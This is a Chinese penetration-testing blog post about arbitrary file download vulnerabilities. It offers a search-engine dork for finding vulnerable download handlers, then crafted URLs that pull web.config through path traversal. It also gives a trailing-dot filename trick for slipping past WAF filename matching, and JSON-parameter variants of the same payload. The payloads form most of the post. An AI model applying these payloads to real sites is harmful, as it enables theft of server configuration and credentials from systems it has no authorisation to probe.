[渗透实战]我对于下载漏洞的认知

下载漏洞认知篇


  • 在漏洞挖掘中自我认为下载漏洞还是比较少的,但Google似乎随处可见。
语法:filetype:ashx inurl:?file=

当然还有很多其他语法这里不做介绍


  • 实例:
http://url/WebDiskServer/FileDownLoad.aspx?fileids=/upload/123.pdf&filenames=123.pdf
  • 分析:

通过filedownload.aspx下载/upload/目录下的123.pdf文件
filenames=123.pdf给下载文件命名为123.pdf

  • 由上可知,下载文件的路径可以被我们人为进行任意控制

进行构造URL下载敏感文件

http://url/WebDiskServer/FileDownLoad.aspx?fileids=/web.config&filenames=web.config

由此便可以对网站中的web.config配置文件进行下载

  • 但这种情况并非回回都是如此

同样的URL:
http://url/WebDiskServer/FileDownLoad.aspx?fileids=/upload/123.pdf&filenames=123.pdf

能不能对web.config进行下载还需要对filedownload.aspx进行分析

例如:
filedownload.aspx对下载路径进行了规定只可以下载URL/down/路径下的文件

那么我们的下载路径可以这么写:
http://url/WebDiskServer/FileDownLoad.aspx?fileids=/../web.config&filenames=web.config
由此便下载了web.config文件

Screenshot_20200520_074835_bin.mt.plus.canary.jpg

一般的可以直接对filedownload.aspx文件进行下载进行分析,进而下载更敏感的文件


  • waf对下载文件拦截

有时候对代码文件进行下载时可能会出现waf的拦截
一般来说:waf无非会对下载文件进行匹配文件名或后缀,如果遇到后缀为aspx,ashx,php以及web.config或config.php之类的文件名,那么waf开始拦截。

绕过手法:

http://url/WebDiskServer/FileDownLoad.aspx?fileids=/../web.config.&filenames=web.config

加.绕过

waf对文件名进行匹配,若遇到web.config即拦截
web.config. waf无法识别 但.net系统可以识别 进而bypass下载

注意:并非所有情况都是如此,


  • 误区:
http://url/WebDiskServer/FileDownLoad.aspx?fileids=23469494516&filenames=123.pdf

fileids的参数内容变成的数字或编码型,像这样的URL形式一般是无法使用下载漏洞的。


  • 下载漏洞URL的其他更多形式

栗子:

downfile.php=/file/123.pdf
downfile.asp=/file/123.pdf
  • 当然在漏洞挖掘中还可能遇到更多的形式,这就需要大家自己多尝试了。

栗子:

http://url/pdfviewer?pdfpath=/1234/1234.pdf

构造:

http://url/pdfviewer?pdfpath=/web.config

Screenshot_20200519_000348.jpg

  • 甚至还有这种类型:

正常文件下载URL :

http://url/Areas/MobileWeb/plugins/DownloadFile.ashx?ct=json&GetData={"name":"体现新的发展 理念推动新的改革实践迈进新的历史阶段-赵刚.pptx","path":"UpLoad\o_1ca2q488isu1s4puq69bq40lq9.pptx"}

构造链接下载web.config

http://url/Areas/MobileWeb/plugins/DownloadFile.ashx?ct=json&GetData={"name":"web.config","path":"UpLoad\web.config"}

发现下载不了,再次构造

http://url/Areas/MobileWeb/plugins/DownloadFile.ashx?ct=json&GetData={"name":"web.config","path":"UpLoad\../web.config"}

本文结束,文章原创:MUCN,转载请注明。

Mucn

Mucn

不管,看了我的博客就得帮忙转载,快点转载一下哦!❤️✔️

留下你的评论

快留下你的小秘密吧